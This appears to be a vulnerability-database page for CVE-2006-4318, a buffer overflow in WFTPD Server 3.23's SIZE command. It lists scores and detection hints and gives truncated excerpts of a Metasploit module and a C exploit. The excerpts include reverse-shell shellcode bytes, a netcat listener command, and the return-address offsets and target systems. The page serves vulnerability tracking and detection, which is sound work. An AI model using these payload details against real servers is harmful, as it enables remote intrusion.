CVE-2006-4318
published 2006-08-24CVE-2006-4318: Buffer overflow in WFTPD Server 3.23 allows remote attackers to execute arbitrary code via long SIZE commands.
PriorityP353medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
62.32%
99.1th percentile
Buffer overflow in WFTPD Server 3.23 allows remote attackers to execute arbitrary code via long SIZE commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| texas_imperial_software | wftpd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6\x10\x92\x98\x83\xeb\xfc\xe2\xf4
- →Alert on FTP SIZE command arguments exceeding normal filename length (e.g., >512 bytes) on port 21, indicative of buffer overflow exploitation of WFTPD 3.23 ↗
- →The exploit uses a reverse shell payload; monitor for unexpected outbound TCP connections from the WFTPD process (wftpd.exe) shortly after a SIZE command is received ↗
- →The exploit payload bad characters are null byte, space, LF, and CR — NOP sleds and shellcode in SIZE arguments will avoid these bytes; scan FTP SIZE arguments for high-entropy non-printable byte sequences ↗
- →The exploit offsets the return address at buffer position 531 (opt=0, path='/') or 532 (opt=1, path='//') within the SIZE argument — look for SIZE arguments with NOP sleds starting at offset 7 ↗
- ·The Metasploit module's payload space is limited to 500 bytes and a stack adjustment of -3500 is applied; exploits with different payload sizes or stack adjustments may not match the exact buffer layout described ↗
- ·Return addresses (JMP ESI gadgets) are OS/SP/language-specific; the exploit targets XP SP2 Polish, 2000 SP4 Polish, XP SP2 English, 2000 SP4 English, and XP SP2 German — detection based on return address values must account for all variants ↗
- ·The exploit requires valid FTP credentials before sending the malicious SIZE command; unauthenticated detection at the network layer alone is insufficient — the attacker must first successfully log in ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)
exploitdb·2010-06-22
CVE-2006-4318 Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)
Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)
---
##
# $Id: wftpd_size.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Texas Imperial Software WFTPD 3.23 SIZE Overflow',
'Description' => %q{
This module exploits a buffer overflow in the SIZE verb in
Texas Imperial's Software WFTPD 3.23.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2006-4318' ],
[ 'OSVDB', '28134' ],
[ 'BID', '19617' ],
],
'Privileged' => true,
'DefaultOption
Exploit-DB
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
exploitdb·2006-08-21
CVE-2006-4318 Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
---
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include
#include
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
Metasploit
Texas Imperial Software WFTPD 3.23 SIZE Overflow
metasploit
Texas Imperial Software WFTPD 3.23 SIZE Overflow
Texas Imperial Software WFTPD 3.23 SIZE Overflow
This module exploits a buffer overflow in the SIZE verb in Texas Imperial's Software WFTPD 3.23.
No writeups or analysis indexed.
http://packetstormsecurity.org/0608-exploits/wftpd_exp.chttp://secunia.com/advisories/21547http://securitytracker.com/id?1016723http://www.osvdb.org/28134http://www.securityfocus.com/bid/19617http://www.vupen.com/english/advisories/2006/3357https://exchange.xforce.ibmcloud.com/vulnerabilities/28523https://www.exploit-db.com/exploits/2233http://packetstormsecurity.org/0608-exploits/wftpd_exp.chttp://secunia.com/advisories/21547http://securitytracker.com/id?1016723http://www.osvdb.org/28134http://www.securityfocus.com/bid/19617http://www.vupen.com/english/advisories/2006/3357https://exchange.xforce.ibmcloud.com/vulnerabilities/28523https://www.exploit-db.com/exploits/2233
2006-08-24
Published